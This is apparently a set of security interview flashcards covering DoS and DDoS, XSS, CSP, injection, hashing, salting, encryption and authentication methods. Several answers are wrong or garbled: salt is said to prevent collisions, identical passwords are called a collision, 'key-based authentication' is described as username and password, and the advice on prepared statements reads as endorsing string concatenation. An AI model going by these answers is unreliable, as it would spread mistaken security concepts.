Security

Question 1

What is a DDoS attack?

Answer 1

Distributed Denial of Service attack

A DoS attack where the traffic flooding the target system comes from many different sources making it much harder to defend against

Question 2

What is a DoS attack?

Answer 2

Denial of Service attack

Attack where a malicious user tries to bring down or damage a system in order to render it unavailable to users, often by flooding the target system

Question 3

What is XSS and how does it occur?

Answer 3

Cross-Site Scripting

A security vulnerability typically found in web apps

Occurs when an app takes untrusted data and sends it without proper validation/escaping

Allows attackers to execute scripts in the victim’s browser which can access any cookies, session tokens or redirect users to malicious sites

Question 4

What are some ways to prevent XSS?

Answer 4

• Sanitise and validate all input
• Add CSP
• Add middleware to enable HTTPOnly flag on cookies to ensure cookies can’t be accessed and can’t be stolen by attackers whose XSS does get through
• Encode output for correct context - encode characters (ie. < or >) to prevent JS from running in that context when putting untrusted data in HTML tag
• Encode both client and server side so app can mitigate DOM-based XSS as well

Question 5

What is the role of SSL certificates?

Answer 5

SSL certificates are what clients and web servers use to prove that a site is who they say they are and then setting up a secure communication channel

Question 6

What is salt?

Answer 6

Unique data (ie. timestamp) added to a hash to prevent hash collisions

Question 7

What are some of the top vulnerabilities in modern web?

Answer 7

• XSS
• SQL injection
• Sensitive data exposure
• Broken authentication and broken access controls

Question 8

What is a hashing collision? Provide example

Answer 8

Where different inputs generate the same hash

To combat this, we can add salt to the hashes

ie. when two users use the same password

Question 9

What does encryption and decryption mean?

Answer 9

Encryption
Turning readable data into unreadable data

Decryption
Turning unreadable data into readable data

Question 10

What is the difference between hashing and encryption?

Answer 10

Hashing is unable to be reversed into its unhashed form

Encryption keeps data secure but recoverable

Question 11

What is CSP?

Answer 11

Content Security Policy

Browser-side mechanism to allow developers to whitelist client side resources (ie. JavaScript, CSS, images)

Applied via a special HTTP header that instructs the browser to only execute/render resources from the whitelist

Question 12

How does injection occur and what types are there?

Answer 12

Injection occurs when untrusted data is sent to an interpreter as part of a command or query

Types:

• SQL injection
• JavaScript injection
• Command injection

Question 13

What are some authentication handshake strategies?

Answer 13

• Key-based authentication
• OAuth
• SSO

Question 14

How does key-based authentication work?

Answer 14

Uses a username and password but comes with the burden of having to keep these details secure

Question 15

How does OAuth work?

Answer 15

Website requests authentication from a third-party service then the logged in user verifies that they would like to share details with the new site

Used by Facebook, Google, Twitter

Question 16

What is the difference between cookie vs session?

Answer 16

Cookie
Data stored by the browser and sent to the server on every request

Session
Data stored on the server and associated with a given user

Question 17

What is the difference between session-based vs token-based authentication?

Answer 17

Session-based
After client authentication, the server passes a unique session ID (that is typically stored in a cookie) and attached to subsequent requests

Token-based
After client authentication, client receives a token to identify the client but can also store additional info

Tokens are applied to HTTP authorization header as a bearer token and sent on subsequent requests

Used for OAuth and SSO strategies

Question 18

What are the pros and cons of session-based authentication?

Answer 18

Pros

• Small size
• Easy to implement

Cons

• Prone to XSS and CSRF attacks
• Sessions are stored in server’s memory, making scaling difficult

Question 19

What are the pros and cons of token-based authentication?

Answer 19

Pros

• Robust security (since JWT is stateless and only a secret key can validate it when received at a server-side application)
• Stored on client side, making it scalable and efficient
• Flexibility and performance

Cons

• Compromised secret key
• Data overhead (larger in size compared to session tokens)
• Short lifespan (annoying for users to regularly reauthorise - refresh tokens can be added to combat this)

Question 20

Why is it better to hash passwords rather than encrypt them?

Answer 20

If someone steals the key used to encrypt the passwords, they will be able to decrypt them

Strong hashing algorithms mean that even if hashed passwords are leaked, it will take longer than the lifetime of the universe to reverse the hash

Question 21

What are the differences between symmetric vs asymmetric encryption?

Answer 21

Symmetric encryption
Data is encoded/decoded using the same key so all authorised users must have a copy of the key

If the key is compromised, all encrypted data can be decrypted

Asymmetric encryption
All authorised users have 2 keys - private/public keys

Encode using the public key and decode with the private key

To send an encrypted message, you encode using the recipient’s public key and the recipient decodes the message using their private key

Question 22

How does SQL/NoSQL injection work?

Answer 22

Allows the attacker to inject code into a db query that will be executed by the db

Caused by developers using dynamic db queries or queries taking user input

ie. search field where data is put inside the query without sanitisation

Question 23

How can we prevent SQL/NoSQL injection?

Answer 23

• Sanitise user input
• Use prepared statements to avoid vulnerabilities and string concatenation to form db queries
• Use principle of least privilege

Question 24

How can we prevent JavaScript injection?

Answer 24

• Sanitise user input
• Not using eval(), setTimeout(), setInterval() functions to parse user input - instead use JSON.parse()
• Enable “strict mode” in Javascript

Question 25

What are some functions vulnerable to JavaScript injection and why?

Answer 25

Vulnerable functions:

• eval()
• setTimeout()
• setInterval()

Web apps using eval() are vulnerable when user input is not validated

Without sanitising the data, an attacker can inject any data they want often leading to a DoS attack

setTimeout() and setInterval() are indirectly vulnerable because their first argument passes user input to the eval() function